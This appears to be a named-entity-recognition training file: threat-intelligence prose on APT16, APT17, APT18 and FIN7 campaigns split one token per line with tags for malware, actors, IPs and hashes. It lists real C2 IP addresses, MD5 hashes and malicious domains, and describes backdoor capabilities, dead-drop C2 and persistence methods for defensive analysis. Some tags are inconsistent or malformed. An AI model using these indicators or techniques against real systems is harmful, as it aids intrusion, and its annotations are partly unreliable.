O + +Based O +on O +the O +email S-TOOL +address O +naming O +convention O +and O +message O +subject O +, O +the O +threat O +actors O +may O +have O +tried O +to O +make O +the O +message O +appear O +to O +be O +a O +legitimate O +communication O +from O +the O +Democratic O +Progressive O +Party O +( O +DPP O +) O +, O +Taiwan S-LOC +’s O +opposition O +party O +. O + +Unlike O +the O +previous O +exploit O +documents O +, O +this O +malicious O +attachment O +did O +not O +contain O +any O +visible O +text O +when O +opened O +in O +Microsoft S-IDTY +Word S-TOOL +. O + +The O +exploit O +documents O +delivered O +during O +the O +December O +campaigns O +dropped O +a O +binary O +containing O +an O +embedded O +variant O +of O +a O +backdoor O +we O +refer O +to O +as O +ELMER S-MAL +. O + +ELMER S-MAL +is O +a O +non-persistent O +proxy-aware O +HTTP S-PROT +backdoor O +written O +in O +Delphi S-TOOL +, O +and O +is O +capable O +of O +performing O +file O +uploads O +and O +downloads O +, O +file O +execution O +, O +and O +process O +and O +directory O +listings O +. O + +To O +retrieve O +commands O +, O +ELMER S-MAL +sends O +HTTP S-PROT +GET O +requests O +to O +a O +hard-coded O +C2 S-TOOL +server O +, O +and O +parses O +the O +HTTP S-PROT +response O +packets O +received O +from O +the O +C2 S-TOOL +server O +for O +an O +integer O +string O +corresponding O +to O +the O +command O +that O +needs O +to O +be O +executed O +. O + +Table O +2 O +lists O +the O +ELMER B-MAL +backdoors E-MAL +observed O +during O +the O +December O +campaigns O +. O + +The O +ELMER S-MAL +variant O +6c33223db475f072119fe51a2437a542 S-MD5 +beaconed O +to O +the O +C2 S-TOOL +IP O +address O +121.127.249.74 S-IP +over O +port O +443 O +. O + + +APT16 S-APT +. 
O + +While O +attribution O +of O +the O +first O +two O +spear B-ACT +phishing E-ACT +attacks O +is O +still O +uncertain O +, O +we O +attribute O +the O +second O +December O +phishing E-ACT +campaign O +to O +the O +China S-LOC +based O +APT O +group O +that O +we O +refer O +to O +as O +APT16 S-APT +. O + +This O +is O +based O +on O +the O +use O +of O +the O +known O +APT16 S-APT +domain O +rinpocheinfo.com S-DOM +, O +as O +well O +as O +overlaps O +in O +previously O +observed O +targeting O +and O +tactics O +, O +techniques O +and O +procedures O +( O +TTPs O +) O +. O + +Taiwanese O +citizens O +will O +go O +to O +the O +polls O +on O +January O +16 O +, O +2016 O +, O +to O +choose O +a O +new O +President O +and O +legislators O +. O + +According O +to O +recent O +opinion O +polls O +, O +the O +Democratic B-IDTY +Progressive I-IDTY +Party E-IDTY +( O +DPP S-IDTY +) O +candidate O +Tsai O +Ing-wen O +is O +leading O +her O +opponents O +and O +is O +widely O +expected O +to O +win O +the O +election O +. O + +The O +DPP O +is O +part O +of O +the O +pan-green O +coalition O +that O +favors O +Taiwanese O +independence O +over O +reunification O +with O +the O +mainland O +, O +and O +the O +party O +’s O +victory O +would O +represent O +a O +shift O +away O +from O +the O +ruling O +Kuomintang O +’s O +closer O +ties O +with O +the O +PRC S-IDTY +. O + +Since O +1949 O +, O +Beijing S-LOC +has O +claimed O +Taiwan S-LOC +as O +a O +part O +of O +China S-LOC +and O +strongly O +opposes O +any O +action O +toward O +independence O +. O + +The O +Chinese B-IDTY +government E-IDTY +is O +therefore O +concerned O +whether O +a O +DPP S-IDTY +victory O +might O +weaken O +the O +commercial O +and O +tourism O +ties O +between O +China S-LOC +and O +Taiwan S-LOC +, O +or O +even O +drive O +Taiwan S-LOC +closer O +to O +independence O +. 
O + +In O +2005 O +, O +the O +Chinese B-IDTY +government E-IDTY +passed O +an O +“ O +anti-secession O +” O +law O +that O +signified O +its O +intention O +to O +use O +“ O +non-peaceful O +” O +means O +to O +stymie O +any O +Taiwanese O +attempt O +to O +secede O +from O +China S-LOC +. O + +APT16 S-APT +actors O +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +two O +Taiwanese O +media O +organization O +addresses O +and O +three O +webmail O +addresses O +. O + +The O +message O +subject O +read O +“ O +DPP S-IDTY +’s O +Contact O +Information O +Update O +” O +, O +apparently O +targeting O +those O +interested O +in O +contact O +information O +for O +DPP S-IDTY +members O +or O +politicians O +. O + +The O +Chinese B-IDTY +government E-IDTY +would O +benefit O +from O +improved O +insight O +into O +local O +media O +coverage O +of O +Taiwanese O +politics O +, O +both O +to O +better O +anticipate O +the O +election O +outcome O +and O +to O +gather O +additional O +intelligence O +on O +politicians O +, O +activists O +, O +and O +others O +who O +interact O +with O +journalists O +. O + +This O +tactic O +is O +not O +without O +precedent O +; O +in O +2013 O +, O +the O +New B-IDTY +York I-IDTY +Times E-IDTY +revealed O +it O +had O +been O +the O +target O +of O +China S-LOC +based O +actors O +shortly O +after O +it O +reported O +on O +the O +alleged O +mass O +accumulation O +of O +wealth O +by O +then-Prime O +Minister O +Wen O +Jiabao O +and O +his O +family O +. O + +The O +actors O +likely O +sought O +information O +on O +the O +newspaper O +’s O +sources O +in O +China S-LOC +, O +who O +could O +be O +silenced O +by O +the O +government O +. 
O + +Compromising O +these O +Taiwanese O +news O +organizations O +would O +also O +allow O +the O +actors O +to O +gain O +access O +to O +informants O +or O +other O +protected O +sources O +, O +who O +might O +then O +be O +targeted O +for O +further O +intelligence O +collection O +or O +even O +retribution O +. O + +The O +webmail O +addresses O +, O +while O +unknown O +, O +were O +possibly O +the O +personal-use O +addresses O +of O +the O +individuals O +whose O +corporate O +domain O +emails S-TOOL +were O +targeted O +. O + +As O +corporate O +networks O +become O +more O +secure O +and O +users O +become O +more O +vigilant O +, O +personal O +accounts O +can O +still O +offer O +a O +means O +to O +bypass O +security O +systems O +. O + +This O +tactic O +exploits O +users O +’ O +reduced O +vigilance O +when O +reading O +their O +own O +personal O +email S-TOOL +, O +even O +when O +using O +corporate O +IT O +equipment O +to O +do O +so O +. O + +On O +the O +same O +date O +that O +APT16 S-APT +targeted O +Taiwanese O +media O +, O +suspected O +Chinese O +APT O +actors O +also O +targeted O +a O +Taiwanese B-IDTY +government E-IDTY +agency O +, O +sending O +a O +lure O +document O +that O +contained O +instructions O +for O +registration O +and O +subsequent O +listing O +of O +goods O +on O +a O +local O +Taiwanese O +auction O +website O +. O + +It O +is O +possible O +, O +although O +not O +confirmed O +, O +that O +APT16 S-APT +was O +also O +responsible O +for O +targeting O +this O +government O +agency O +, O +given O +both O +the O +timeframe O +and O +the O +use O +of O +the O +same O +n-day O +to O +eventually O +deploy O +the O +ELMER B-MAL +backdoor E-MAL +. O + +One O +of O +the O +media O +organizations O +involved O +in O +this O +latest O +activity O +was O +targeted O +in O +June O +2015 O +, O +while O +its O +Hong O +Kong O +branch O +was O +similarly O +targeted O +in O +August O +2015 O +. 
O + +APT16 S-APT +actors O +were O +likely O +also O +responsible O +for O +the O +June O +2015 O +activity O +. O + +They O +sent O +spear B-ACT +phishing E-ACT +messages O +with O +the O +subject O +“ O +2015 O +Taiwan S-LOC +Security O +and O +Cultural O +Forum O +Invitation O +Form O +” O +, O +and O +used O +a O +different O +tool O +– O +a O +tool O +that O +we O +refer O +to O +as O +DOORJAMB S-MAL +– O +in O +their O +attempt O +to O +compromise O +the O +organization O +. O + +A O +different O +group O +, O +known O +as O +admin@338 S-EMAIL +, O +used O +LOWBALL S-MAL +malware O +during O +its O +Hong B-LOC +Kong E-LOC +activity O +. O + +Despite O +the O +differing O +sponsorship O +, O +penetration O +of O +Hong B-LOC +Kong E-LOC +and O +Taiwan S-LOC +based O +media O +organizations O +continues O +to O +be O +a O +priority O +for O +China S-LOC +based O +threat O +groups O +. O + +The O +difference O +in O +sponsorship O +could O +be O +the O +result O +of O +tasking O +systems O +that O +allocate O +targeting O +responsibility O +to O +different O +groups O +based O +on O +their O +targets O +’ O +geographic O +location O +. O + +In O +other O +words O +, O +while O +media O +organizations O +are O +important O +targets O +, O +it O +is O +possible O +that O +two O +separate O +groups O +are O +responsible O +for O +Hong B-LOC +Kong E-LOC +and O +Taiwan S-LOC +, O +respectively O +. O + +The O +suspected O +APT16 S-APT +targeting O +of O +the O +Taiwanese B-IDTY +government E-IDTY +agency O +– O +in O +addition O +to O +the O +Taiwanese O +media O +organizations O +– O +further O +supports O +this O +possibility O +. O + +IRONHALO S-MAL +: O +CVE-2015-1701 S-VULID +. O + +ELMER S-MAL +: O +CVE-2015-1701 S-VULID +. O + +These O +clusters O +of O +activity O +raise O +interesting O +questions O +about O +the O +use O +of O +an O +identical O +silently-patched O +vulnerability O +, O +possibly O +by O +multiple O +threat O +groups O +. 
O + +Both O +Japan S-LOC +and O +Taiwan S-LOC +are O +important O +intelligence O +collection O +targets O +for O +China S-LOC +, O +particularly O +because O +of O +recent O +changes O +to O +Japan S-LOC +’s O +pacifist O +constitution O +and O +the O +upcoming O +Taiwanese O +election O +. O + +Based O +on O +our O +visibility O +and O +available O +data O +, O +we O +only O +attribute O +one O +campaign O +to O +the O +Chinese O +APT O +group O +APT16 S-APT +. O + + +APT17 S-APT +. O + +FireEye S-SECTEAM +Threat O +Intelligence O +and O +the O +Microsoft S-IDTY +Threat O +Intelligence O +Center O +investigated O +a O +command-and-control S-TOOL +( O +C2 S-TOOL +) O +obfuscation O +tactic O +used O +on O +Microsoft S-IDTY +’s O +TechNet S-TOOL +, O +a O +web O +portal O +for O +IT O +professionals O +. O + +TechNet S-TOOL +’s O +security O +was O +in O +no O +way O +compromised O +by O +this O +tactic O +, O +which O +is O +likely O +possible O +on O +other O +message O +boards O +and O +forums O +. O + +FireEye S-SECTEAM +Threat O +Intelligence O +assesses O +that O +APT17 S-APT +, O +a O +China S-LOC +based O +threat O +group O +, O +was O +behind O +the O +attempt O +. O + +Other O +groups O +have O +used O +legitimate O +websites O +to O +host O +C2 S-TOOL +IP O +address O +in O +the O +past O +. O + +APT17 S-APT +was O +embedding O +the O +encoded O +C2 S-TOOL +IP O +address O +for O +the O +BLACKCOFFEE S-MAL +malware O +in O +legitimate O +Microsoft S-IDTY +TechNet S-TOOL +profiles O +pages O +and O +forum O +threads O +, O +a O +method O +some O +in O +the O +information O +security O +community O +call O +a O +“ O +dead O +drop O +resolver. O +” O +Encoding O +the O +IP O +address O +makes O +it O +more O +difficult O +to O +identify O +the O +true O +C2 S-TOOL +address O +for O +network O +security O +professionals O +. O + +Few O +security O +companies O +have O +publicly O +discussed O +this O +tactic O +. 
O + +After O +discovering O +the O +BLACKCOFFEE S-MAL +activity O +, O +the O +FireEye-Microsoft S-SECTEAM +team O +encoded O +a O +sinkhole O +IP O +address O +into O +the O +profile O +pages O +and O +forum O +threads O +and O +locked O +the O +accounts O +to O +prevent O +the O +threat O +actors O +from O +making O +any O +changes O +. O + +This O +collaborative O +approach O +allowed O +the O +team O +to O +observe O +the O +malware O +and O +its O +victims O +. O + +Though O +the O +security O +community O +has O +not O +yet O +broadly O +discussed O +this O +technique O +, O +FireEye S-SECTEAM +has O +observed O +other O +threat O +groups O +adopting O +these O +measures O +and O +expect O +this O +trend O +to O +continue O +on O +other O +community O +sites O +. O + +Today O +, O +FireEye S-SECTEAM +released O +Indicators O +of O +Compromise O +( O +IOCs O +) O +for O +BLACKCOFFEE S-MAL +and O +Microsoft S-IDTY +released O +signatures O +for O +its O +anti-malware O +products O +. O + +APT17 S-APT +, O +also O +known O +as O +DeputyDog S-APT +, O +is O +a O +Chinabased O +threat O +group O +that O +FireEye S-SECTEAM +Intelligence O +has O +observed O +conducting O +network O +intrusions O +against O +U.S. S-LOC +government O +entities O +, O +the O +defense O +industry O +, O +law O +firms O +, O +information O +technology O +companies O +, O +mining O +companies O +, O +and O +non-government O +organizations O +. O + +BLACKCOFFEE S-MAL +’s O +functionality O +includes O +uploading O +and O +downloading O +files O +; O +creating O +a O +reverse O +shell O +; O +enumerating O +files O +and O +processes O +; O +renaming O +, O +moving O +, O +and O +deleting O +files O +; O +terminating O +processes O +; O +and O +expanding O +its O +functionality O +by O +adding O +new O +backdoor O +commands O +. 
O + +FireEye S-SECTEAM +has O +monitored O +APT17 S-APT +’s O +use O +of O +BLACKCOFFEE S-MAL +variants O +since O +2013 O +to O +masquerade O +malicious O +communication O +as O +normal O +web O +traffic O +by O +disguising O +the O +C2 S-TOOL +communication O +as O +queries O +to O +web O +search O +engines O +. O + +The O +use O +of O +BLACKCOFFEE S-MAL +demonstrates O +threat O +actors O +’ O +evolving O +use O +of O +public O +websites O +to O +hide O +in O +plain O +sight O +. O + +In O +the O +past O +, O +threat O +actors O +would O +modify O +easily O +compromised O +websites O +to O +host O +C2 S-TOOL +commands O +and O +configuration O +, O +as O +observed O +in O +the O +China S-LOC +based O +APT1 S-APT +’s O +WEBC2 S-MAL +suite O +of O +backdoors O +. O + +Now O +, O +threat O +actors O +are O +using O +well-known O +websites—that O +they O +do O +not O +need O +to O +compromise O +to O +host O +C2 S-TOOL +IP O +addresses O +. O + +They O +simply O +use O +the O +website O +for O +legitimate O +purposes O +, O +such O +as O +posting O +forum O +threads O +or O +creating O +profile O +pages O +. O + +APT17 S-APT +went O +further O +to O +obfuscate O +their O +C2 S-TOOL +IP O +address O +and O +employed O +a O +multi-layered O +approach O +for O +the O +malware O +to O +finally O +beacon O +the O +true O +C2 S-TOOL +IP O +. O + +They O +used O +legitimate O +infrastructure—the O +ability O +to O +post O +or O +create O +comments O +on O +forums O +and O +profile O +pages—to O +embed O +a O +string O +that O +the O +malware O +would O +decode O +to O +find O +and O +communicate O +with O +the O +true O +C2 S-TOOL +IP O +address O +. O + +This O +additional O +obfuscation O +puts O +yet O +another O +layer O +between O +APT17 S-APT +and O +the O +security O +professionals O +attempting O +to O +chase O +them O +down O +. 
O + +This O +BLACKCOFFEE S-MAL +variant O +contains O +one O +or O +more O +URLs O +that O +link O +to O +the O +biography O +sections O +of O +attacker-created O +profiles O +as O +well O +as O +forum O +threads O +that O +contain O +comments O +from O +those O +same O +profiles O +. O + +A O +URL O +is O +randomly O +selected O +and O +the O +malware O +searches O +at O +that O +location O +for O +an O +encoded O +IP O +address O +located O +between O +two O +tags O +, O +“ O +@MICR0S0FT O +” O +and O +“ O +C0RP0RATI0N O +” O +. O + +The O +malware O +then O +communicates O +directly O +with O +the O +retrieved O +and O +decoded O +IP O +address O +to O +receive O +commands O +and O +send O +stolen O +information O +. O + +If O +the O +C2 S-TOOL +server O +is O +discovered O +or O +shut O +down O +, O +the O +threat O +actors O +can O +update O +the O +encoded O +IP O +address O +on O +TechNet S-TOOL +to O +maintain O +control O +of O +the O +victims O +’ O +machines O +. O + +BLACKCOFFEE S-MAL +supports O +an O +initial O +set O +of O +fifteen O +commands O +, O +including O +creating O +a O +reverse O +shell O +, O +uploading O +and O +downloading O +files O +, O +and O +enumerating O +files O +and O +processes O +. O + +The O +attackers O +can O +also O +extend O +BLACKCOFFEE S-MAL +’s O +functionality O +through O +additional O +commands O +sent O +as O +shellcode O +. O + +APT17 S-APT +: O +de56eb5046e518e266e67585afa34612 S-MD5 +. O + +APT17 S-APT +: O +195ade342a6a4ea0a58cfbfb43dc64cb S-MD5 +. O + +APT17 S-APT +: O +4c21336dad66ebed2f7ee45d41e6cada S-MD5 +. O + +APT17 S-APT +: O +0370002227619c205402c48bde4332f6 S-MD5 +. O + +APT17 S-APT +: O +ac169b7d4708c6fa7fee9be5f7576414 S-MD5 +. O + +APT17 S-APT +: O +130.184.156.62 S-IP +. O + +APT17 S-APT +: O +69.80.72.165 S-IP +. O + +APT17 S-APT +: O +110.45.151.43 S-IP +. O + +APT17 S-APT +: O +121.101.73.231 S-IP +. O + + +APT18 S-APT +. 
O + +Dell B-SECTEAM +SecureWorks I-SECTEAM +Counter I-SECTEAM +Threat I-SECTEAM +Unit E-SECTEAM +( O +CTU S-SECTEAM +) O +analysts O +were O +recently O +engaged O +with O +a O +client O +thought O +to O +have O +been O +compromised O +by O +a O +threat O +group O +CTU S-SECTEAM +researchers O +have O +named O +Threat B-APT +Group-0416 E-APT +( O +TG-0416 S-APT +) O +. O + +Various O +artifacts O +from O +the O +initial O +phases O +of O +the O +incident O +provided O +strong O +indications O +of O +the O +existence O +of O +this O +particular O +threat O +group O +within O +the O +client's O +infrastructure O +. O + +TG-0416 S-APT +is O +a O +stealthy O +and O +extremely O +successful O +Advanced O +Persistent O +Threat O +( O +APT O +) O +group O +known O +to O +target O +a O +broad O +range O +of O +verticals O +since O +at O +least O +2009 O +, O +including O +technology O +, O +industrial O +, O +manufacturing O +, O +human O +rights O +groups O +, O +government O +, O +pharmaceutical O +, O +and O +medical O +technology O +. O + +The O +threat O +actors O +achieved O +an O +initial O +foothold O +into O +the O +infrastructure O +via O +phishing B-TOOL +email E-TOOL +that O +convinced O +victims O +to O +install O +the O +Xyligan S-MAL +remote O +access O +Trojan S-MAL +( O +RAT O +) O +on O +a O +system O +. O + +The O +threat O +actors O +then O +installed O +the O +hcdLoader S-MAL +RAT O +, O +which O +installs O +as O +a O +Windows S-OS +service O +and O +provides O +command O +line O +access O +to O +the O +compromised O +system O +. O + +Using O +host-based O +digital O +forensic O +analysis O +, O +CTU S-SECTEAM +analysts O +observed O +the O +intruders O +using O +the O +native O +‘ O +at.exe S-FILE +’ O +Windows S-OS +task O +scheduler O +tool O +to O +move O +laterally O +within O +the O +infrastructure O +. 
O + +Many O +threat O +groups O +use O +lateral O +movement O +techniques O +, O +but O +this O +engagement O +allowed O +CTU S-SECTEAM +analysts O +to O +not O +only O +further O +validate O +indicators O +of O +lateral O +movement O +, O +but O +also O +to O +look O +a O +bit O +closer O +at O +those O +indicators O +and O +expand O +the O +cluster O +of O +indicators O +surrounding O +the O +use O +of O +at.exe S-FILE +for O +lateral O +movement O +within O +the O +infrastructure O +. O + +Threat O +actors O +accessed O +the O +source O +host O +via O +the O +hcdLoader S-MAL +RAT O +. O + +The O +sole O +indicator O +on O +the O +source O +host O +that O +at.exe S-FILE +had O +been O +run O +was O +an O +application O +Prefetch O +file O +( O +C:\Windows\Prefetch\AT.EXE-BB02E639.pf S-FILE +) O +that O +was O +created O +when O +the O +tool O +was O +executed O +. O + +Beyond O +the O +file O +system O +metadata O +for O +the O +Prefetch S-TOOL +file O +( O +creation O +and O +last O +modification O +times O +) O +and O +the O +last O +execution O +time O +within O +the O +file O +metadata O +, O +CTU S-SECTEAM +analysts O +did O +not O +observe O +any O +indicators O +of O +value O +on O +the O +source O +host O +. O + +Two O +files O +are O +created O +for O +the O +task O +at O +approximately O +the O +same O +time O +: O +C:\Windows\System32\Tasks\At1 O +and O +C:\Windows\Tasks\At1.job S-FILE +. O + +The O +first O +file O +is O +an O +Extensible B-TOOL +Markup I-TOOL +Language E-TOOL +( O +XML S-TOOL +) O +file O +that O +can O +be O +opened O +and O +viewed O +in O +a O +text O +editor O +. O + +The O +second O +file O +follows O +a O +decodable O +binary O +format O +. 
O + +The O +operating O +system O +also O +creates O +a O +registry O +key O +within O +the O +software O +registry O +hive O +that O +is O +specifically O +associated O +with O +the O +creation O +of O +the O +scheduled O +task O +on O +the O +destination O +host O +: O +Microsoft\Windows S-OS +NT\CurrentVersion\Schedule\TaskCache\Tree\At1 O +. O + +The O +Task O +Scheduler O +service O +names O +the O +tasks O +, O +so O +subsequent O +tasks O +are O +named O +At2 O +, O +At3 O +, O +and O +so O +on O +. O + + +FIN7.5 S-APT +: O +the O +infamous O +cybercrime O +rig O +FIN7 S-APT +continues O +its O +activities O +. O + +On O +August B-TIME +1, I-TIME +2018 E-TIME +, O +the O +US S-LOC +Department B-IDTY +of I-IDTY +Justice E-IDTY +announced O +that O +it O +had O +arrested O +several O +individuals O +suspected O +of O +having O +ties O +to O +the O +FIN7 S-APT +cybercrime O +rig O +. O + +FIN7 S-APT +operations O +are O +linked O +to O +numerous O +intrusion O +attempts O +having O +targeted O +hundreds O +of O +companies O +since O +at O +least O +as B-TIME +early I-TIME +as I-TIME +2015 E-TIME +. O + +Interestingly O +, O +this O +threat O +actor O +created O +fake O +companies O +in O +order O +to O +hire O +remote O +pentesters O +, O +developers O +and O +interpreters O +to O +participate O +in O +their O +malicious O +business O +. O + +The O +main O +goal O +behind O +its O +malicious O +activities O +was O +to O +steal O +financial O +assets O +from O +companies O +, O +such O +as O +debit O +cards O +, O +or O +get O +access O +to O +financial O +data O +or O +computers O +of O +finance O +department O +employees O +in O +order O +to O +conduct O +wire O +transfers O +to O +offshore O +accounts O +. 
O + +In O +2018-2019 S-TIME +, O +researchers O +of O +Kaspersky B-SECTEAM +Lab E-S-SECTEAM +’s O +Global B-SECTEAM +Research I-SECTEAM +and I-SECTEAM +Analysis I-SECTEAM +Team E-SECTEAM +analyzed O +various O +campaigns O +that O +used O +the O +same O +Tactics O +Tools O +and O +Procedures O +( O +TTPs O +) O +as O +the O +historic O +FIN7 S-APT +, O +leading O +the O +researchers O +to O +believe O +that O +this O +threat O +actor O +had O +remained O +active O +despite O +the O +2018 S-TIME +arrests O +. O + +In O +addition O +, O +during O +the O +investigation O +, O +we O +discovered O +certain O +similarities O +to O +other O +attacker O +groups O +that O +seemed O +to O +share O +or O +copy O +the O +FIN7 S-APT +TTPs O +in O +their O +own O +operations O +. O + +The O +FIN7 S-APT +intrusion O +set O +continued O +its O +tailored O +spear B-ACT +phishing E-ACT +campaigns O +throughout O +last B-TIME +year E-TIME +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +has O +been O +able O +to O +retrieve O +some O +of O +these O +exchanges O +from O +a O +FIN7 S-APT +target O +. O + +The O +spear B-ACT +phishing E-ACT +campaigns O +were O +remarkably O +sophisticated O +from O +a O +social O +engineering O +perspective O +. O + +In O +various O +cases O +, O +the O +operators O +exchanged O +numerous O +messages O +with O +their O +victims O +for O +weeks O +before O +sending O +their O +malicious O +documents O +. O + +The O +emails S-TOOL +were O +efficient O +social-engineering O +attempts O +that O +appealed O +to O +a O +vast O +number O +of O +human O +emotions O +( O +fear O +, O +stress O +, O +anger O +, O +etc. O +) O +to O +elicit O +a O +response O +from O +their O +victims O +. 
O + +One O +of O +the O +domains O +used O +by O +the O +attackers O +in O +their O +2018 S-TIME +campaign O +of O +spear B-ACT +phishing E-ACT +contained O +more O +than O +130 O +email S-TOOL +aliases O +, O +leading O +us O +to O +think O +that O +more O +than O +130 O +companies O +had O +been O +targeted O +by O +the B-TIME +end I-TIME +of I-TIME +2018 E-TIME +. O + +We O +have O +seen O +two O +types O +of O +documents O +sent O +to O +victims O +in O +these O +spear B-ACT +phishing E-ACT +campaigns O +. O + +The O +first O +one O +exploits O +the O +INCLUDEPICTURE S-TOOL +feature O +of O +Microsoft S-IDTY +Word S-TOOL +to O +get O +context O +information O +about O +the O +victim’s O +computer O +, O +and O +the O +availability O +and O +version O +number O +of O +Microsoft S-IDTY +Word S-TOOL +. O + +The O +second O +one O +, O +which O +in O +many O +cases O +is O +an O +Office S-TOOL +document O +protected O +with O +a O +trivial O +password O +, O +such O +as O +“ O +12345 O +” O +, O +“ O +1234 O +” O +, O +etc. O +, O +uses O +macros S-TOOL +to O +execute O +a O +GRIFFON S-MAL +implant O +on O +the O +target’s O +computer O +. O + +In O +various O +cases O +, O +the O +associated O +macro S-TOOL +also O +scheduled O +tasks O +to O +make O +GRIFFON S-MAL +persistent O +. O + +Interestingly O +, O +following O +some O +open-source O +publications O +about O +them O +, O +the O +FIN7 S-APT +operators O +seems O +to O +have O +developed O +a O +homemade O +builder O +of O +malicious O +Office S-TOOL +document O +using O +ideas O +from O +ThreadKit S-MAL +, O +which O +they O +employed O +during O +the B-TIME +summer I-TIME +of I-TIME +2018 E-TIME +. O + +The O +new O +builder O +inserts O +random O +values O +in O +the O +Author O +and O +Company O +metadata O +fields O +. 
O + +Moreover O +, O +the O +builder O +allows O +these O +to O +modify O +different O +IOCs S-TOOL +, O +such O +as O +the O +filenames O +of O +wscript.exe S-FILE +or O +sctasks.exe S-FILE +copies O +, O +etc O +. O + +The O +GRIFFON S-MAL +implant O +is O +a O +lightweight O +JScript S-TOOL +validator-style O +implant O +without O +any O +persistence O +mechanism O +. O + +The O +malware O +is O +designed O +for O +receiving O +modules O +to O +be O +executed O +in-memory O +and O +sending O +the O +results O +to O +C2s O +. O + +We O +were O +able O +to O +obtain O +four O +different O +modules O +during O +the O +investigation O +. O + +The O +first O +module O +downloaded O +by O +the O +GRIFFON S-MAL +malware O +to O +the O +victim’s O +computer O +is O +an O +information-gathering O +JScript S-TOOL +, O +which O +allows O +the O +cybercriminals O +to O +understand O +the O +context O +of O +the O +infected O +workstation O +. O + +This O +module O +mainly O +relies O +on O +WMI S-TOOL +and O +Windows S-OS +objects O +to O +deliver O +results O +, O +which O +will O +be O +sent O +back O +to O +the O +operators O +. O + +Interestingly O +, O +more O +than O +20 O +artifacts O +are O +retrieved O +from O +the O +system O +by O +this O +implant O +during O +the O +reconnaissance O +stage O +, O +from O +the O +date O +and O +time O +of O +operating O +system O +installation O +and O +membership O +in O +a O +Windows S-OS +domain O +to O +a O +list O +of O +and O +the O +resolutions O +of O +the O +workstation’s O +monitors O +. O + +The O +second O +module O +is O +used O +by O +the O +operators O +to O +execute O +an O +obfuscated O +PowerShell S-TOOL +script O +, O +which O +contains O +a O +Meterpreter S-TOOL +downloader S-TOOL +widely O +known O +as O +“ O +Tinymet S-TOOL +“ O +. O + +This O +downloader S-TOOL +, O +seen O +in O +past O +FIN7 S-APT +campaigns O +, O +downloads O +a O +one-byte O +XOR S-ENCR +encrypted O +( O +eg. 
O +with O +the O +key O +equal O +to O +0x50 O +or O +0x51 O +) O +piece O +of O +meterpreter S-TOOL +shellcode O +to O +execute O +. O + +The O +third O +module O +allows O +the O +operators O +to O +take O +a O +screenshot O +of O +the O +remote O +system O +. O + +To O +do O +that O +, O +it O +also O +drops O +a O +PowerShell S-TOOL +script O +on O +the O +workstation O +to O +execute O +. O + +The O +script O +executes O +an O +open-source O +.NET S-FILE +class O +used O +for O +taking O +a O +screenshot O +. O + +The O +resulting O +screenshot O +is O +saved O +at O +“ O +%TMP%/image.png S-FILE +” O +, O +sent O +back O +to O +the O +attackers O +by O +the O +GRIFFON S-MAL +implant O +and O +then O +deleted O +. O + +The O +last O +retrieved O +module O +is O +a O +persistence O +module O +. O + +If O +the O +victim O +appears O +valuable O +to O +the O +attackers O +, O +a O +GRIFFON S-MAL +implant O +installer S-TOOL +is O +pushed O +to O +the O +victim’s O +workstation O +. O + +This O +module O +stores O +another O +instance O +of O +the O +GRIFFON S-MAL +implant O +inside O +the O +registry O +to O +achieve O +persistence O +. O + +Here O +is O +a O +PowerLinks S-TOOL +style O +method O +used O +by O +the O +attackers O +to O +achieve O +persistence O +and O +execute O +the O +GRIFFON S-MAL +implant O +at O +each O +user O +logon O +. O + +The O +new O +GRIFFON S-MAL +implant O +is O +written O +to O +the O +hard O +drive O +before O +each O +execution O +, O +limiting O +the O +“ O +file-less O +” O +aspect O +of O +this O +method O +. O + +Through O +its O +light O +weight O +and O +modular O +architecture O +, O +the O +GRIFFON S-MAL +implant O +is O +the O +perfect O +validator O +. 
O + +Even O +though O +we O +have O +been O +able O +to O +retrieve O +four O +different O +modules O +, O +it O +is O +possible O +that O +the O +FIN7 S-APT +operators O +have O +more O +modules O +in O +their O +toolsets O +for O +achieving O +their O +objectives O +on O +the O +victim’s O +workstation O +. O + +Attackers O +make O +mistakes O +, O +and O +FIN7 S-APT +are O +no O +exception O +. O + +The O +major O +error O +made O +by O +its O +operators O +allowed O +us O +to O +follow O +the O +command O +and O +control O +server O +of O +the O +GRIFFON S-MAL +implant O +last B-TIME +year E-TIME +. O + +In O +order O +to O +trick O +blue O +teams O +and O +other O +DFIR S-TOOL +analysts O +, O +the O +operators O +created O +fake O +HTTP S-PROT +302 O +redirection O +to O +various O +Google S-IDTY +services O +on O +their O +C2s O +servers O +. O + +This O +error O +allowed O +us O +to O +follow O +the O +infrastructure O +week O +by O +week O +, O +until O +an O +individual O +pushed O +on O +Twitter S-IDTY +the O +heuristic O +to O +track O +their O +C2 S-TOOL +at O +the B-TIME +end I-TIME +of I-TIME +December I-TIME +2018 E-TIME +. O + +A O +few O +days O +after O +the O +tweet O +, O +in O +January B-TIME +2019 E-TIME +, O +the O +operators O +changed O +their O +landing O +page O +in O +order O +to O +prevent O +this O +type O +of O +tracking O +against O +their O +infrastructure O +. O + +During O +the O +investigation O +related O +to O +the O +GRIFFON S-MAL +infrastructure O +, O +we O +found O +a O +strange O +overlap O +between O +the O +WHOIS S-TOOL +record O +of O +an O +old O +GRIFFON S-MAL +C2 S-TOOL +and O +the O +website O +of O +a O +fake O +company O +. O + +According O +to O +the O +website O +, O +that O +domain O +supposedly O +belongs O +to O +a O +legitimate O +security O +company O +“ O +fully O +owned O +by O +the O +Russian B-IDTY +Government E-IDTY +” O +( O +sic O +. 
O +) O +and O +having O +offices O +in O +“ O +Moscow S-LOC +, O +Saint B-LOC +Petersburg E-LOC +and O +Yekaterinburg S-LOC +” O +, O +but O +the O +address O +says O +the O +company O +is O +located O +in O +Trump B-IDTY +Tower E-IDTY +, O +in O +New B-LOC +York E-LOC +. O + +Given O +FIN7 S-APT +’s O +previous O +use O +of O +false O +security O +companies O +, O +we O +decided O +to O +look O +deeper O +into O +this O +one O +. O + +As O +we O +were O +looking O +at O +the O +content O +of O +the O +website O +, O +it O +became O +evident O +that O +almost O +all O +of O +the O +text O +used O +was O +lifted O +from O +legitimate O +security-company O +websites O +. O + +Phrases O +and O +sentences O +were O +borrowed O +from O +at O +least O +the O +following O +companies/sites O +: O +DKSec S-IDTY +– O +www.dksec.com S-DOM +, O +OKIOK S-IDTY +– O +www.okiok.com/services/tailored-solutions S-DOM +, O +MainNerve S-IDTY +– O +www.mainnerve.com S-DOM +, O +Datics S-IDTY +– O +www.datatics.com/cyber-security S-DOM +, O +Perspective B-IDTY +Risk E-IDTY +– O +www.perspectiverisk.com S-DOM +, O +Synack S-IDTY +– O +https://www.synack.com/company S-DOM +, O +FireEye S-IDTY +– O +https://www.fireeye.com/services/penetration-testing.html S-URL +. O + 